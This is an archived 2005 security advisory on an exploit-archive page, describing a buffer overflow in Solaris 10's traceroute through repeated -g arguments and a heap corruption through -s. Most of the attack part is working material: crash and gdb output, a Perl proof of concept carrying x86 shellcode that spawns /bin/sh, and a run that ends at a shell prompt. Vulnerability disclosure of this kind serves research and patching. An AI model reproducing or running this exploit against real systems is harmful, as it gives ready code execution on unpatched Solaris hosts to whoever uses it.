traceSolaris.txt

traceSolaris.txt: Posted Jun 25, 2005; Authored by Venglin | Site frasunek.com; traceroute under Solaris 10 is susceptible to a buffer overflow in the handling of the -g argument. Sample exploitation included.; tags | exploit, overflow; systems | solaris; SHA-256 | cb0c0dbe8ee0f3edaaa0aa00d00ef0112897f0cc43532ced7b96994aa211b0bb; Download | Favorite | View

traceSolaris.txt

/usr/sbin/traceroute from Solaris 10 is vulnerable to buffer overflow in
handling -g argument. After supplying 10 -g parameters, return address is
overwritten by IP address argument:

atari:root:/home/venglin# /usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g
7 -g 8 -g 9 -g 10 127.0.0.1
traceroute: too many IPv4 gateways
traceroute: unknown IPv4 host 1
traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 88 byte packets
Segmentation fault (core dumped)

atari:root:/home/venglin# gdb /usr/sbin/traceroute core
[...]
Core was generated by `/usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7
-g 8 -g 9 -g 10 127.0.0'.
Program terminated with signal 11, Segmentation fault.
[...]
#0  0x0100007f in ?? ()

0x0100007f is of course 127.0.0.1.

It is possible to run arbitrary code, but because of using __init_suid_priv(),
impact is limited to raw socket access.

It is interesting, that this vulnerability is specific to Solaris 10. It doesn't
affect Solaris 8 or 9, nor the OpenSolaris.

Proof of concept code:

#!/usr/bin/perl

$ret = 0x8046bb0;  # heap, solaris on amd64

$shellcode = "A" x 5000 .
"\xb8\xff\xf8\xff\x3c\xf7\xd0\x50\x31\xc0\xb0\x9a\x50\x89\xe5\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68/bin\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\xff\xd5";

$ip = sprintf("%d.%d.%d.%d", $ret & 0xff, ($ret & 0xff00) >> 8, ($ret &
0xff0000) >> 16, ($ret & 0xff000000) >> 24);

$cmd = "/usr/sbin/traceroute -g '$shellcode' -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8
-g 9 -g 10 $ip";

print $cmd, "\n";

system($cmd);



atari:venglin:~> perl ./trace.pl
traceroute: too many IPv4 gateways
traceroute: unknown IPv4 host AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[...]
traceroute to 176.107.4.8 (176.107.4.8), 30 hops max, 88 byte packets
$


Another vulnerability is heap corruption after malformed -s argument:

atari:root:/home/venglin# gdb /usr/sbin/traceroute core
[...]
#0  0xfee7178d in _free_unlocked ()
   from /lib/libc.so.1
(gdb) bt
#0  0xfee7178d in _free_unlocked () from /lib/libc.so.1
#1  0xfee71752 in free () from /lib/libc.so.1
#2  0xfefa49a6 in freeaddrinfo () from /lib/libsocket.so.1
#3  0x08052a7a in main ()


-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

traceSolaris.txt

traceSolaris.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

traceSolaris.txt

Share This

traceSolaris.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems